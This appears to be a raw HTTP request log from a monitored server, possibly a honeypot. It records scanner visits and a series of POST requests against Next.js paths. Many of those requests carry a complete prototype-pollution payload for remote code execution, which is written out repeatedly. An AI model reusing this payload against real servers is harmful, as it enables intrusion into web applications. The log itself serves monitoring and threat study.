Priority: u=0, i
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:58374
Path: /login
URL: /login
Method: GET
[2026-03-17 16:47:25] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
Via: 2.0 Caddy
If-Modified-Since: Mon, 10 Nov 2025 15:08:02 GMT
Accept: */*
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-Dest: script
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:58374
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-17 16:47:25] === HTTP Request ===
===================
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Accept-Encoding: gzip, deflate, br
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
If-Modified-Since: Sat, 07 Feb 2026 11:38:56 GMT
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Dest: script
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:58374
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-17 16:47:25] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Sec-Fetch-Site: same-origin
If-Modified-Since: Mon, 10 Nov 2025 15:08:02 GMT
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: style
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: no-cors
Priority: u=2
Accept: text/css,*/*;q=0.1
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:58374
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-17 16:47:25] === HTTP Request ===
[2026-03-17 16:47:25] Main page accessed - IP: 172.30.0.12:58374
===================
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:58374
Path: /
URL: /
Method: GET
[2026-03-17 16:47:25] === HTTP Request ===
[2026-03-17 14:51:14] Main page accessed - IP: 35.241.150.107:38216
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.241.150.107:38216
Path: /
URL: /
Method: GET
[2026-03-17 14:51:14] === HTTP Request ===
===================
------WebKitFormBoundaryx567915402325--
------WebKitFormBoundaryx567915402325
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx567915402325
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 100911+true+5627884;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx567915402325
Connection: close
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx567915402325
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
X-Nextjs-Request-Id: poop1234
X-Nextjs-Html-Request-Id: ilovepoop_567915402325
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:36030
Path: /api/route
URL: /api/route
Method: POST
[2026-03-17 12:51:21] === HTTP Request ===
===================
------WebKitFormBoundaryx177202258185--
------WebKitFormBoundaryx177202258185
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx177202258185
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 130732+true+1355462;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx177202258185
X-Nextjs-Html-Request-Id: ilovepoop_177202258185
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx177202258185
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Content-Length: 518
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:36022
Path: /app
URL: /app
Method: POST
[2026-03-17 12:51:21] === HTTP Request ===
===================
------WebKitFormBoundaryx2143250983937--
------WebKitFormBoundaryx2143250983937
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2143250983937
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 284252+true+7539968;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2143250983937
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_2143250983937
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2143250983937
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:42720
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-17 12:51:18] === HTTP Request ===
===================
------WebKitFormBoundaryx358414429283--
------WebKitFormBoundaryx358414429283
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx358414429283
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 98569+true+3636178;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx358414429283
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx358414429283
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_358414429283
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:42706
Path: /api
URL: /api
Method: POST
[2026-03-17 12:51:15] === HTTP Request ===
===================
------WebKitFormBoundaryx519902692211--
------WebKitFormBoundaryx519902692211
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx519902692211
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 94886+true+5479235;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx519902692211
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx519902692211
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_519902692211
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:42690
Path: /_next
URL: /_next
Method: POST
[2026-03-17 12:51:12] === HTTP Request ===
[2026-03-17 12:51:10] Main page accessed - IP: 95.214.55.63:55052
===================
------WebKitFormBoundaryx811079706004--
------WebKitFormBoundaryx811079706004
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx811079706004
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 236519+true+3429237;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx811079706004
X-Nextjs-Html-Request-Id: ilovepoop_811079706004
Next-Action: x
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx811079706004
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:55052
Path: /
URL: /
Method: POST
[2026-03-17 12:51:10] === HTTP Request ===
[2026-03-17 12:50:59] Main page accessed - IP: 95.214.55.63:55026
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:55026
Path: /
URL: /
Method: GET
[2026-03-17 12:50:59] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:44488
Path: /jars
URL: /jars
Method: GET
[2026-03-17 12:32:02] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.130:23170
Path: /wiki
URL: /wiki
Method: GET
[2026-03-17 11:58:46] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.130:23148
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-17 11:58:42] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.130:23136
Path: *
URL: *
Method: PRI
[2026-03-17 11:58:42] === HTTP Request ===
[2026-03-17 11:58:42] Main page accessed - IP: 66.132.153.130:23122
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.130:23122
Path: /
URL: /
Method: GET
[2026-03-17 11:58:42] === HTTP Request ===
[2026-03-17 11:58:38] Main page accessed - IP: 66.132.153.130:41018
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.130:41018
Path: /
URL: /
Method: GET
[2026-03-17 11:58:38] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.94.138.192:62408
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-17 11:57:48] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 167.94.138.192:62384
Path: *
URL: *
Method: PRI
[2026-03-17 11:57:45] === HTTP Request ===
[2026-03-17 11:57:41] Main page accessed - IP: 167.94.138.192:62382
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.94.138.192:62382
Path: /
URL: /
Method: GET
[2026-03-17 11:57:41] === HTTP Request ===
[2026-03-17 10:48:31] Main page accessed - IP: 95.214.55.63:56110
===================
User-Agent: python-requests/2.31.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:56110
Path: /
URL: /
Method: GET
[2026-03-17 10:48:31] === HTTP Request ===
[2026-03-17 10:48:26] Main page accessed - IP: 172.30.0.12:40764
===================
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.4
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept: */*
X-Openai-Host-Hash: 867116608
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40764
Path: /
URL: /
Method: GET
[2026-03-17 10:48:26] === HTTP Request ===
===================
X-Forwarded-For: 74.7.241.160
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40764
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-17 10:48:23] === HTTP Request ===
[2026-03-17 10:33:16] Main page accessed - IP: 64.23.214.73:50030
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 64.23.214.73:50030
Path: /
URL: /
Method: GET
[2026-03-17 10:33:16] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Google Chrome";v="142", "Not-A.Brand";v="8", "Chromium";v="142"
Accept-Encoding: gzip, deflate
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Ch-Ua-Platform: "Linux"
Sec-Gpc: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Connection: keep-alive
Accept-Language: en-US,en;q=0.5
Sec-Fetch-Dest: document
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 137.184.230.244:42046
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-17 10:15:18] === HTTP Request ===
[2026-03-17 10:15:18] Main page accessed - IP: 137.184.230.244:42034
===================
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: document
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Ch-Ua: "Google Chrome";v="142", "Not-A.Brand";v="8", "Chromium";v="142"
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Sec-Gpc: 1
Sec-Ch-Ua-Platform: "Linux"
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 137.184.230.244:42034
Path: /
URL: /
Method: GET
[2026-03-17 10:15:18] === HTTP Request ===
[2026-03-17 09:40:47] Main page accessed - IP: 172.30.0.12:58548
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 205.210.31.13
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:58548
Path: /
URL: /
Method: GET
[2026-03-17 09:40:47] === HTTP Request ===
[2026-03-17 08:34:00] Main page accessed - IP: 205.210.31.106:59142
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.106:59142
Path: /
URL: /
Method: GET
[2026-03-17 08:34:00] === HTTP Request ===
[2026-03-17 07:36:46] Main page accessed - IP: 164.92.82.91:51880
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 164.92.82.91:51880
Path: /
URL: /
Method: GET
[2026-03-17 07:36:46] === HTTP Request ===
[2026-03-17 06:33:33] Main page accessed - IP: 172.30.0.12:39786
===================
X-Forwarded-For: 198.235.24.220
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39786
Path: /
URL: /
Method: GET
[2026-03-17 06:33:33] === HTTP Request ===
[2026-03-17 06:26:45] Main page accessed - IP: 172.105.128.13:28972
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.105.128.13:28972
Path: /
URL: /
Method: GET
[2026-03-17 06:26:45] === HTTP Request ===
===================
------WebKitFormBoundaryx1144280109582--
------WebKitFormBoundaryx1144280109582
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1144280109582
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 310261+true+3688121;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1144280109582
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1144280109582
X-Nextjs-Html-Request-Id: ilovepoop_1144280109582
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:49082
Path: /api/route
URL: /api/route
Method: POST
[2026-03-17 04:16:31] === HTTP Request ===
===================
------WebKitFormBoundaryx634879836673--
------WebKitFormBoundaryx634879836673
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx634879836673
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 255792+true+2482016;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx634879836673
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx634879836673
X-Nextjs-Html-Request-Id: ilovepoop_634879836673
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:49072
Path: /app
URL: /app
Method: POST
[2026-03-17 04:16:30] === HTTP Request ===
===================
------WebKitFormBoundaryx875764047826--
------WebKitFormBoundaryx875764047826
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx875764047826
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 309825+true+2826641;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx875764047826
X-Nextjs-Html-Request-Id: ilovepoop_875764047826
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx875764047826
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 518
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:49068
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-17 04:16:28] === HTTP Request ===
===================
------WebKitFormBoundaryx780203144778--
------WebKitFormBoundaryx780203144778
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx780203144778
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 147751+true+5280527;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx780203144778
X-Nextjs-Html-Request-Id: ilovepoop_780203144778
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx780203144778
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 518
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:44396
Path: /api
URL: /api
Method: POST
[2026-03-17 04:16:25] === HTTP Request ===
===================
------WebKitFormBoundaryx579775952692--
------WebKitFormBoundaryx579775952692
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx579775952692
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 238797+true+2427903;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx579775952692
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx579775952692
X-Nextjs-Html-Request-Id: ilovepoop_579775952692
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:44388
Path: /_next
URL: /_next
Method: POST
[2026-03-17 04:16:24] === HTTP Request ===
[2026-03-17 04:16:21] Main page accessed - IP: 95.214.55.63:44376
===================
------WebKitFormBoundaryx501401336581--
------WebKitFormBoundaryx501401336581
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx501401336581
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 198633+true+2524260;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx501401336581
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_501401336581
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx501401336581
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:44376
Path: /
URL: /
Method: POST
[2026-03-17 04:16:21] === HTTP Request ===
[2026-03-17 04:16:21] Main page accessed - IP: 95.214.55.63:44370
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.55.63:44370
Path: /
URL: /
Method: GET
[2026-03-17 04:16:21] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 169.197.113.175:50036
Path: /config.json
URL: /config.json
Method: GET
[2026-03-17 04:12:02] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 169.197.113.175:50020
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-17 04:12:02] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 169.197.113.175:50014
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-17 04:12:02] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 169.197.113.175:50000
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-17 04:12:01] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 169.197.113.175:49994
Path: /robots.txt
